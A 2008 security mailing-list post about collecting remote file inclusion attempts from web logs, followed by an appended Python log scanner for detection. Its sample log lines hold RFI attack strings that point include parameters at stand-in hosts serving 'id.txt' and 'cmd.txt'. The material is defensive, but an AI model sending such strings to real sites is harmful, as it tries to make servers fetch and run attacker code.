[nsp-sec] RFI locations
Jose Nazario
jose at arbor.net
Thu Oct 2 14:07:02 EDT 2008
ripped through monkey's HTTP logs and came up with the attached list of
suspicious RFI attempts. spot testing reveals a variety of "hack" markers
and such.
data range:
start 01/Oct/2008:05:30:04
end 02/Oct/2008:14:02:31
117 distinct URLs, mapped to ASNs. attached.
i am looking at automating this, FYI.
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
security researcher, office of the CTO, arbor networks
v: (734) 821 1427 http://asert.arbornetworks.com/
-------------- next part --------------
Bulk mode; whois.cymru.com [2008-10-02 18:04:46 +0000]
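The log pass described in the message above, sketched as an added example (not part of the original post or its attachment, and not the author's tooling). The sample log lines, the `LOCAL_HOSTS` value and the function names are constructed or assumed; resolving hostnames to IPs before the ASN lookup is left out so the block runs offline.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined log format (not from the original logs).
SAMPLE_LOG = '''\
198.51.100.7 - - [01/Oct/2008:05:30:04 -0400] "GET /index.php?page=http://files.example.net/id.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
198.51.100.7 - - [01/Oct/2008:05:30:09 -0400] "GET /index.php?page=http://files.example.net/id.txt%0D HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
203.0.113.20 - - [01/Oct/2008:06:11:40 -0400] "GET /blog/?p=117 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.99 - - [02/Oct/2008:14:02:31 -0400] "GET /a.php?inc=ftp%3A%2F%2F192.0.2.44%2Fcmd.txt%3F&x=1 HTTP/1.0" 404 209 "-" "-"
192.0.2.5 - - [02/Oct/2008:14:02:40 -0400] "GET /out?url=http://www.example.org/about HTTP/1.1" 302 0 "-" "Mozilla/5.0"
'''
LOCAL_HOSTS = {"www.example.org"}  # assumed: the logging site's own hostnames

REQUEST = re.compile(r'\[(?P<ts>[^\]]+)\] "(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r"^(?:https?|ftp)://", re.I)

def rfi_candidates(log_text, local_hosts=LOCAL_HOSTS):
    """Map each distinct remote URL passed as a query parameter to host, hits and time range."""
    found = {}
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        query = m["target"].partition("?")[2]
        # parse_qsl percent-decodes, so encoded ftp%3A%2F%2F... values are caught too
        for _name, value in parse_qsl(query):
            # Fold variants that differ only by a trailing "?" or CR/LF into one URL
            url = value.strip().rstrip("?\r\n ")
            if not REMOTE.match(url):
                continue
            try:
                host = urlsplit(url).hostname
            except ValueError:  # malformed authority in attacker-supplied input
                host = None
            if not host or host in local_hosts:
                continue  # links back to the site itself are not remote includes
            rec = found.setdefault(url, {"host": host, "hits": 0, "first": m["ts"]})
            rec["hits"] += 1
            rec["last"] = m["ts"]
    return found

def cymru_bulk_query(ips):
    """Build the text of a whois.cymru.com bulk lookup (sent to TCP port 43)."""
    return "begin\nverbose\n" + "\n".join(sorted(set(ips))) + "\nend\n"

if __name__ == "__main__":
    for url, rec in sorted(rfi_candidates(SAMPLE_LOG).items()):
        print(rec["hits"], rec["host"], url, rec["first"], rec["last"])
```
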